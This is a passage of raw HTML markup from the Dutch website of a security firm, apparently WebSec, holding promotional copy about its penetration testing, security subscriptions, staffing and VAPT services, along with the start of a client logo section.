/_next/image?url=%2Fassets%2Fservices%2FPentesting.png&amp;w=128&amp;q=90 128w, /_next/image?url=%2Fassets%2Fservices%2FPentesting.png&amp;w=220&amp;q=90 220w, /_next/image?url=%2Fassets%2Fservices%2FPentesting.png&amp;w=256&amp;q=90 256w, /_next/image?url=%2Fassets%2Fservices%2FPentesting.png&amp;w=360&amp;q=90 360w, /_next/image?url=%2Fassets%2Fservices%2FPentesting.png&amp;w=384&amp;q=90 384w, /_next/image?url=%2Fassets%2Fservices%2FPentesting.png&amp;w=425&amp;q=90 425w, /_next/image?url=%2Fassets%2Fservices%2FPentesting.png&amp;w=480&amp;q=90 480w, /_next/image?url=%2Fassets%2Fservices%2FPentesting.png&amp;w=640&amp;q=90 640w, /_next/image?url=%2Fassets%2Fservices%2FPentesting.png&amp;w=750&amp;q=90 750w, /_next/image?url=%2Fassets%2Fservices%2FPentesting.png&amp;w=828&amp;q=90 828w, /_next/image?url=%2Fassets%2Fservices%2FPentesting.png&amp;w=1080&amp;q=90 1080w, /_next/image?url=%2Fassets%2Fservices%2FPentesting.png&amp;w=1111&amp;q=90 1111w, /_next/image?url=%2Fassets%2Fservices%2FPentesting.png&amp;w=1200&amp;q=90 1200w, /_next/image?url=%2Fassets%2Fservices%2FPentesting.png&amp;w=1400&amp;q=90 1400w" src="/_next/image?url=%2Fassets%2Fservices%2FPentesting.png&amp;w=1400&amp;q=90"><h3 class="text-base md:text-2xl font-semibold">Pentests</h3></div><p class="mb-5 section-summary">Penetratietest-diensten omvatten het uitvoeren van gesimuleerde cyberaanvallen op een systeem of netwerk om kwetsbaarheden te identificeren en beveiligingsmaatregelen te beoordelen, waardoor organisaties hun verdediging tegen echte dreigingen kunnen versterken.</p><a class="text-dark-lave flex items-center gap-1 hover:gap-2 ease-in mt-auto duration-200 font-medium text-sm lg:text-base" href="https://websec.nl/diensten/pentest"><span>Leer over<!-- --> <!-- -->Pentests</span> <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 16 16" height="23" width="23" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" d="M4 8a.5.5 0 0 1 .5-.5h5.793L8.146 5.354a.5.5 0 1 1 .708-.708l3 3a.5.5 0 0 1 0 .708l-3 3a.5.5 0 0 1-.708-.708L10.293 8.5H4.5A.5.5 0 0 1 4 8"></path></svg></a></div><div class="p-5 md:p-8 lg:p-12 lg:pt-9 shadow-servicecard bg-serviceCard border-serviceCard border flex flex-col rounded-2xl"><div class="flex items-center lg:flex-col lg:items-start"><img alt="" loading="lazy" decoding="async" data-nimg="fill" class="object-contain !relative max-w-[80px] sm:max-w-[100px] aspect-square" style="position:absolute;height:100%;width:100%;left:0;top:0;right:0;bottom:0;color:transparent" sizes="120px" srcset="/_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=16&amp;q=90 16w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=32&amp;q=90 32w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=48&amp;q=90 48w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=60&amp;q=90 60w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=64&amp;q=90 64w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=96&amp;q=90 96w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=120&amp;q=90 120w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=128&amp;q=90 128w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=220&amp;q=90 220w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=256&amp;q=90 256w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=360&amp;q=90 360w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=384&amp;q=90 384w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=425&amp;q=90 425w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=480&amp;q=90 480w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=640&amp;q=90 640w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=750&amp;q=90 750w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=828&amp;q=90 828w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=1080&amp;q=90 1080w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=1111&amp;q=90 1111w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=1200&amp;q=90 1200w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=1400&amp;q=90 1400w" src="/_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=1400&amp;q=90"><h3 class="text-base md:text-2xl font-semibold">Beveiligings abonnementen</h3></div><p class="mb-5 section-summary">Beveiligingsabonnementen bieden een reeks pakketten die zowel offensieve als defensieve beveiligingsoplossingen omvatten, waarbij een uitgebreide beveiliging tegen een eerlijke prijs wordt gewaarborgd voor bedrijven van elke omvang.</p><a class="text-dark-lave flex items-center gap-1 hover:gap-2 ease-in mt-auto duration-200 font-medium text-sm lg:text-base" href="https://websec.nl/diensten/security-abonnementen"><span>Leer over<!-- --> <!-- -->Beveiligings abonnementen</span> <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 16 16" height="23" width="23" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" d="M4 8a.5.5 0 0 1 .5-.5h5.793L8.146 5.354a.5.5 0 1 1 .708-.708l3 3a.5.5 0 0 1 0 .708l-3 3a.5.5 0 0 1-.708-.708L10.293 8.5H4.5A.5.5 0 0 1 4 8"></path></svg></a></div><div class="p-5 md:p-8 lg:p-12 lg:pt-9 shadow-servicecard bg-serviceCard border-serviceCard border flex flex-col rounded-2xl sm:col-span-full lg:col-span-1"><div class="flex items-center lg:flex-col lg:items-start"><img alt="" loading="lazy" decoding="async" data-nimg="fill" class="object-contain !relative max-w-[80px] sm:max-w-[100px] aspect-square" style="position:absolute;height:100%;width:100%;left:0;top:0;right:0;bottom:0;color:transparent" sizes="120px" srcset="/_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=16&amp;q=90 16w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=32&amp;q=90 32w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=48&amp;q=90 48w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=60&amp;q=90 60w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=64&amp;q=90 64w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=96&amp;q=90 96w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=120&amp;q=90 120w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=128&amp;q=90 128w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=220&amp;q=90 220w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=256&amp;q=90 256w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=360&amp;q=90 360w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=384&amp;q=90 384w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=425&amp;q=90 425w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=480&amp;q=90 480w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=640&amp;q=90 640w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=750&amp;q=90 750w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=828&amp;q=90 828w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=1080&amp;q=90 1080w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=1111&amp;q=90 1111w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=1200&amp;q=90 1200w, /_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=1400&amp;q=90 1400w" src="/_next/image?url=%2Fassets%2Fservices%2FSecurity%20Subscriptions.png&amp;w=1400&amp;q=90"><h3 class="text-base md:text-2xl font-semibold">Beveiligingspersoneel</h3></div><p class="mb-5 section-summary">Staffing Services bieden de perfecte oplossing om uw team aan te vullen met bekwame beveiligingsprofessionals, waardoor een robuuste verdediging tegen cyberdreigingen wordt gewaarborgd en de operationele efficiëntie wordt verbeterd.</p><a class="text-dark-lave flex items-center gap-1 hover:gap-2 ease-in mt-auto duration-200 font-medium text-sm lg:text-base" href="https://websec.nl/diensten/security-abonnementen"><span>Leer over<!-- --> <!-- -->Beveiligingspersoneel</span> <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 16 16" height="23" width="23" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" d="M4 8a.5.5 0 0 1 .5-.5h5.793L8.146 5.354a.5.5 0 1 1 .708-.708l3 3a.5.5 0 0 1 0 .708l-3 3a.5.5 0 0 1-.708-.708L10.293 8.5H4.5A.5.5 0 0 1 4 8"></path></svg></a></div><div class="p-5 md:p-8 lg:p-12 shadow-servicecard bg-serviceCard border border-serviceCard flex flex-col rounded-2xl sm:space-y-4 sm:col-span-full lg:col-span-1"><h3 class="text-base md:text-2xl font-semibold">Andere diensten van WebSec</h3><div class="para xl:text-15 grid xs:grid-cols-2 md:max-lg:grid-cols-3 gap-x-5 p-2 lg:gap-x-12 font-medium whitespace-nowrap "><a class="flex gap-2 mt-2.5 hover:text-sig-red group duration-200 w-full" href="https://websec.nl/diensten/web-applicatie-pentest"><div class="w-[1.3rem] h-[1.3rem]  rounded-full fxc bg-[#998EA9]s bg-dark-lave/80 borders mt-1 shrink-0  text-white duration-200"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 16 16" height="19" width="19" xmlns="http://www.w3.org/2000/svg"><path d="M10.97 4.97a.75.75 0 0 1 1.07 1.05l-3.99 4.99a.75.75 0 0 1-1.08.02L4.324 8.384a.75.75 0 1 1 1.06-1.06l2.094 2.093 3.473-4.425z"></path></svg></div><span class="border-b border-dashed border-transparent group-hover:border-sig-red w-full">Web Application VAPT</span></a><a class="flex gap-2 mt-2.5 hover:text-sig-red group duration-200 w-full" href="https://websec.nl/diensten/infrastructuur-pentest"><div class="w-[1.3rem] h-[1.3rem]  rounded-full fxc bg-[#998EA9]s bg-dark-lave/80 borders mt-1 shrink-0  text-white duration-200"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 16 16" height="19" width="19" xmlns="http://www.w3.org/2000/svg"><path d="M10.97 4.97a.75.75 0 0 1 1.07 1.05l-3.99 4.99a.75.75 0 0 1-1.08.02L4.324 8.384a.75.75 0 1 1 1.06-1.06l2.094 2.093 3.473-4.425z"></path></svg></div><span class="border-b border-dashed border-transparent group-hover:border-sig-red w-full">Infrastructure VAPT</span></a><a class="flex gap-2 mt-2.5 hover:text-sig-red group duration-200 w-full" href="https://websec.nl/diensten/mobiele-applicatie-pentest"><div class="w-[1.3rem] h-[1.3rem]  rounded-full fxc bg-[#998EA9]s bg-dark-lave/80 borders mt-1 shrink-0  text-white duration-200"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 16 16" height="19" width="19" xmlns="http://www.w3.org/2000/svg"><path d="M10.97 4.97a.75.75 0 0 1 1.07 1.05l-3.99 4.99a.75.75 0 0 1-1.08.02L4.324 8.384a.75.75 0 1 1 1.06-1.06l2.094 2.093 3.473-4.425z"></path></svg></div><span class="border-b border-dashed border-transparent group-hover:border-sig-red w-full">Mobile App VAPT</span></a><a class="flex gap-2 mt-2.5 hover:text-sig-red group duration-200 w-full" href="https://websec.nl/diensten/cloud-beveiliging"><div class="w-[1.3rem] h-[1.3rem]  rounded-full fxc bg-[#998EA9]s bg-dark-lave/80 borders mt-1 shrink-0  text-white duration-200"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 16 16" height="19" width="19" xmlns="http://www.w3.org/2000/svg"><path d="M10.97 4.97a.75.75 0 0 1 1.07 1.05l-3.99 4.99a.75.75 0 0 1-1.08.02L4.324 8.384a.75.75 0 1 1 1.06-1.06l2.094 2.093 3.473-4.425z"></path></svg></div><span class="border-b border-dashed border-transparent group-hover:border-sig-red w-full">Cloud Service VAPT</span></a><a class="flex gap-2 mt-2.5 hover:text-sig-red group duration-200 w-full" href="https://websec.nl/diensten/ics-scada-pentest"><div class="w-[1.3rem] h-[1.3rem]  rounded-full fxc bg-[#998EA9]s bg-dark-lave/80 borders mt-1 shrink-0  text-white duration-200"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 16 16" height="19" width="19" xmlns="http://www.w3.org/2000/svg"><path d="M10.97 4.97a.75.75 0 0 1 1.07 1.05l-3.99 4.99a.75.75 0 0 1-1.08.02L4.324 8.384a.75.75 0 1 1 1.06-1.06l2.094 2.093 3.473-4.425z"></path></svg></div><span class="border-b border-dashed border-transparent group-hover:border-sig-red w-full">ICS/SCADA VAPT</span></a><a class="flex gap-2 mt-2.5 hover:text-sig-red group duration-200 w-full" href="https://websec.nl/diensten/iot-pentest"><div class="w-[1.3rem] h-[1.3rem]  rounded-full fxc bg-[#998EA9]s bg-dark-lave/80 borders mt-1 shrink-0  text-white duration-200"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 16 16" height="19" width="19" xmlns="http://www.w3.org/2000/svg"><path d="M10.97 4.97a.75.75 0 0 1 1.07 1.05l-3.99 4.99a.75.75 0 0 1-1.08.02L4.324 8.384a.75.75 0 1 1 1.06-1.06l2.094 2.093 3.473-4.425z"></path></svg></div><span class="border-b border-dashed border-transparent group-hover:border-sig-red w-full">IoT VAPT</span></a><a class="flex gap-2 mt-2.5 hover:text-sig-red group duration-200 w-full" href="https://websec.nl/diensten/wifi-pentest"><div class="w-[1.3rem] h-[1.3rem]  rounded-full fxc bg-[#998EA9]s bg-dark-lave/80 borders mt-1 shrink-0  text-white duration-200"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 16 16" height="19" width="19" xmlns="http://www.w3.org/2000/svg"><path d="M10.97 4.97a.75.75 0 0 1 1.07 1.05l-3.99 4.99a.75.75 0 0 1-1.08.02L4.324 8.384a.75.75 0 1 1 1.06-1.06l2.094 2.093 3.473-4.425z"></path></svg></div><span class="border-b border-dashed border-transparent group-hover:border-sig-red w-full">WiFi VAPT</span></a><a class="flex gap-2 mt-2.5 hover:text-sig-red group duration-200 w-full" href="https://websec.nl/diensten/coronacheck-app-pentest"><div class="w-[1.3rem] h-[1.3rem]  rounded-full fxc bg-[#998EA9]s bg-dark-lave/80 borders mt-1 shrink-0  text-white duration-200"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 16 16" height="19" width="19" xmlns="http://www.w3.org/2000/svg"><path d="M10.97 4.97a.75.75 0 0 1 1.07 1.05l-3.99 4.99a.75.75 0 0 1-1.08.02L4.324 8.384a.75.75 0 1 1 1.06-1.06l2.094 2.093 3.473-4.425z"></path></svg></div><span class="border-b border-dashed border-transparent group-hover:border-sig-red w-full">CoronaCheck VAPT</span></a></div><a class="min-w-fit font-semibold rounded-full fxc overflow-hidden relative no-underline gap-2 duration-150 shadow outline-none active:ring-0 focus:ring-2 active:scale-[0.97] hover:opacity-85 from-sig-red to-sig-red/80 ring-sig-red/50 border-sig-red px-8 h-14 border-2 text-sig-red bg-none hover:bg-sig-red/10 shadow-lavender-mid/15 mx-auto my-3" href="https://websec.nl/diensten"><span>Bekijk alle diensten</span><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 16 16" class="text-2xl" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" d="M4 8a.5.5 0 0 1 .5-.5h5.793L8.146 5.354a.5.5 0 1 1 .708-.708l3 3a.5.5 0 0 1 0 .708l-3 3a.5.5 0 0 1-.708-.708L10.293 8.5H4.5A.5.5 0 0 1 4 8"></path></svg></a></div></div></section><section class="px-5 max-w-6xl mx-auto xl:px-0 my-20 md:my-24 lg:my-36 max-md:hidden"><h2 class="text-[1.6rem] font-semibold text-center xs:text-3xl sm:text-4xl md:text-[2.5rem] 2xl:text-[3rem]"><div class="fxc md:justify-start"><div class="text-[#4800B1] mr-[0.3em]">Vooruitstrevende</div><div>Benadering</div></div></h2><div class="section-summary space-y-3 my-5 max-w-3xl"><p>Ervaar ongekende beveiliging met onze baanbrekende aanpak in 8 stappen. Onze geavanceerde technieken en innovatieve oplossingen bieden ongeëvenaarde bescherming tegen opkomende bedreigingen en kwetsbaarheden, waardoor de beveiliging naar nieuwe hoogten wordt getild. Revolutioneer uw beveiligingsmaatregelen met ons.</p></div><div class="items-centers w-full my-14 mt-28 ml-1 hidden md:flex"><div class="flex items-start min-w-[17rem] pt-16 lg:min-w-[19rem]"><div class="flex mx-2 flex-col ml-16 relative w-full"><div class="lg:text-lg py-4 flex items-center relative gap-3.5 -left-1.5 duration-100 cursor-pointer text-sig-red"><div class="rounded-full duration-200 border-2 bg-white w-3 h-3 -translate-x-px border-sig-red/80"></div><span>Kwaliteit</span></div><div class="lg:text-lg py-4 flex items-center relative gap-3.5 -left-1.5 duration-100 cursor-pointer text-[#383240]"><div class="rounded-full duration-200 border-2 bg-white border-dark-lave/30 w-3 h-3 -translate-x-px"></div><span>Innovatie</span></div><div class="lg:text-lg py-4 flex items-center relative gap-3.5 -left-1.5 duration-100 cursor-pointer text-[#383240]"><div class="rounded-full duration-200 border-2 bg-white border-dark-lave/30 w-3 h-3 -translate-x-px"></div><span>Communicatie</span></div><div class="lg:text-lg py-4 flex items-center relative gap-3.5 -left-1.5 duration-100 cursor-pointer text-[#383240]"><div class="rounded-full duration-200 border-2 bg-white border-dark-lave/30 w-3 h-3 -translate-x-px"></div><span>Expertise</span></div><div class="lg:text-lg py-4 flex items-center relative gap-3.5 -left-1.5 duration-100 cursor-pointer text-[#383240]"><div class="rounded-full duration-200 border-2 bg-white border-dark-lave/30 w-3 h-3 -translate-x-px"></div><span>Duurzaamheid</span></div><div class="lg:text-lg py-4 flex items-center relative gap-3.5 -left-1.5 duration-100 cursor-pointer text-[#383240]"><div class="rounded-full duration-200 border-2 bg-white border-dark-lave/30 w-3 h-3 -translate-x-px"></div><span>Nazorg</span></div><div style="top:0;height:0" class="absolute pointer-events-none w-[120%] left-[-20%] rounded-lg h-12 bg-gray-200/40 duration-200 -z-1"></div><div class="w-16 flex h-[121%] pb-1 flex-col absolute bottom-5 -z-1 left-0 -translate-x-full"><div class="h-14 w-full border-gray-300 border-b-2 rounded border-dashed border-l-2"></div><div class="grow border-r-2 border-gray-300 border-dashed"></div></div></div></div><div class="grow flex justify-center gap-7 flex-col mr-14"><div class="p-5 bg-white md:p-9 max-w-none shadow-navdrop border-serviceCard border rounded-xl"><div class="grid grid-cols-[auto,1fr] grid-rows-[auto,auto] gap-x-3 mb-3 items-center md:text-lg lg:text-xl 2xl:text-[1.65rem] lg:gap-y-3 lg:gap-x-2"><img alt="technological globe protected icon" loading="lazy" width="40" height="40" decoding="async" data-nimg="1" class="object-contain row-span-2 my-0 lg:row-start-2 lg:row-span-1" style="color:transparent" sizes="50px" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-protected.6234c481.png&amp;w=16&amp;q=75 16w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-protected.6234c481.png&amp;w=32&amp;q=75 32w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-protected.6234c481.png&amp;w=48&amp;q=75 48w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-protected.6234c481.png&amp;w=60&amp;q=75 60w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-protected.6234c481.png&amp;w=64&amp;q=75 64w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-protected.6234c481.png&amp;w=96&amp;q=75 96w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-protected.6234c481.png&amp;w=120&amp;q=75 120w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-protected.6234c481.png&amp;w=128&amp;q=75 128w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-protected.6234c481.png&amp;w=220&amp;q=75 220w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-protected.6234c481.png&amp;w=256&amp;q=75 256w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-protected.6234c481.png&amp;w=360&amp;q=75 360w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-protected.6234c481.png&amp;w=384&amp;q=75 384w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-protected.6234c481.png&amp;w=425&amp;q=75 425w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-protected.6234c481.png&amp;w=480&amp;q=75 480w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-protected.6234c481.png&amp;w=640&amp;q=75 640w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-protected.6234c481.png&amp;w=750&amp;q=75 750w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-protected.6234c481.png&amp;w=828&amp;q=75 828w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-protected.6234c481.png&amp;w=1080&amp;q=75 1080w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-protected.6234c481.png&amp;w=1111&amp;q=75 1111w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-protected.6234c481.png&amp;w=1200&amp;q=75 1200w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-protected.6234c481.png&amp;w=1400&amp;q=75 1400w" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-protected.6234c481.png&amp;w=1400&amp;q=75"><strong class="font-semibold md:text-slate-800 lg:col-span-2">WebSec</strong><strong class="text-xs font-medium md:text-sm 2xl:text-base text-slate-800/90">Op Maat Gemaakte Oplossingen</strong></div><p class="!my-0 section-summary">Elke oplossing die we bieden is nauwkeurig op maat gemaakt voor de unieke behoeften van elke klant, waarbij de hoogste kwaliteit en beste pasvorm voor optimale resultaten wordt gewaarborgd.</p></div><div class="p-5 bg-white md:p-9 max-w-none shadow-navdrop border-serviceCard border rounded-xl"><div class="grid grid-cols-[auto,1fr] grid-rows-[auto,auto] gap-x-3 mb-3 items-center md:text-lg lg:text-xl 2xl:text-[1.65rem] lg:gap-y-3 lg:gap-x-2"><img alt="technological globe un-protected icon" loading="lazy" width="40" height="40" decoding="async" data-nimg="1" class="object-contain row-span-2 my-0 lg:row-start-2 lg:row-span-1" style="color:transparent" sizes="50px" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-unprotected.19ee71ed.png&amp;w=16&amp;q=75 16w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-unprotected.19ee71ed.png&amp;w=32&amp;q=75 32w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-unprotected.19ee71ed.png&amp;w=48&amp;q=75 48w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-unprotected.19ee71ed.png&amp;w=60&amp;q=75 60w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-unprotected.19ee71ed.png&amp;w=64&amp;q=75 64w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-unprotected.19ee71ed.png&amp;w=96&amp;q=75 96w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-unprotected.19ee71ed.png&amp;w=120&amp;q=75 120w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-unprotected.19ee71ed.png&amp;w=128&amp;q=75 128w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-unprotected.19ee71ed.png&amp;w=220&amp;q=75 220w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-unprotected.19ee71ed.png&amp;w=256&amp;q=75 256w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-unprotected.19ee71ed.png&amp;w=360&amp;q=75 360w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-unprotected.19ee71ed.png&amp;w=384&amp;q=75 384w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-unprotected.19ee71ed.png&amp;w=425&amp;q=75 425w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-unprotected.19ee71ed.png&amp;w=480&amp;q=75 480w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-unprotected.19ee71ed.png&amp;w=640&amp;q=75 640w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-unprotected.19ee71ed.png&amp;w=750&amp;q=75 750w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-unprotected.19ee71ed.png&amp;w=828&amp;q=75 828w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-unprotected.19ee71ed.png&amp;w=1080&amp;q=75 1080w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-unprotected.19ee71ed.png&amp;w=1111&amp;q=75 1111w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-unprotected.19ee71ed.png&amp;w=1200&amp;q=75 1200w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-unprotected.19ee71ed.png&amp;w=1400&amp;q=75 1400w" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fglobe-unprotected.19ee71ed.png&amp;w=1400&amp;q=75"><strong class="font-semibold md:text-slate-800 lg:col-span-2">Industriegemiddelde</strong><strong class="text-xs font-medium md:text-sm 2xl:text-base text-slate-800/90">Standaardoplossingen</strong></div><p class="!my-0  section-summary">Veel bedrijven in onze branche bieden voorgepakte oplossingen die mogelijk niet volledig voldoen aan de unieke behoeften van elke klant, wat de algehele kwaliteit kan aantasten.</p></div></div></div></section><section class="px-5 max-w-6xl mx-auto xl:px-0 my-20 md:my-24 lg:my-36 space-y-10 sm:space-y-16"><h2 class="text-[1.6rem] font-semibold text-center xs:text-3xl sm:text-4xl md:text-[2.5rem] 2xl:text-[3rem]">Beveiligd door WebSec</h2><div class="fxc flex-wrap gap-x-10 lg:gap-x-14 gap-y-4"><div class="h-16 lg:h-20 max-w-[200px] relative fxc shrink-0 rounded-md overflow-hidden"><img alt="client image" loading="lazy" decoding="async" data-nimg="fill" class="object-scale-down !relative" style="position:absolute;height:100%;width:100%;left:0;top:0;right:0;bottom:0;color:transparent" sizes="220px" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20erasmus%20university%20rotterdam.b5c43ab2.png&amp;w=16&amp;q=75 16w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20erasmus%20university%20rotterdam.b5c43ab2.png&amp;w=32&amp;q=75 32w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20erasmus%20university%20rotterdam.b5c43ab2.png&amp;w=48&amp;q=75 48w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20erasmus%20university%20rotterdam.b5c43ab2.png&amp;w=60&amp;q=75 60w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20erasmus%20university%20rotterdam.b5c43ab2.png&amp;w=64&amp;q=75 64w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20erasmus%20university%20rotterdam.b5c43ab2.png&amp;w=96&amp;q=75 96w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20erasmus%20university%20rotterdam.b5c43ab2.png&amp;w=120&amp;q=75 120w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20erasmus%20university%20rotterdam.b5c43ab2.png&amp;w=128&amp;q=75 128w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20erasmus%20university%20rotterdam.b5c43ab2.png&amp;w=220&amp;q=75 220w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20erasmus%20university%20rotterdam.b5c43ab2.png&amp;w=256&amp;q=75 256w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20erasmus%20university%20rotterdam.b5c43ab2.png&amp;w=360&amp;q=75 360w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20erasmus%20university%20rotterdam.b5c43ab2.png&amp;w=384&amp;q=75 384w, 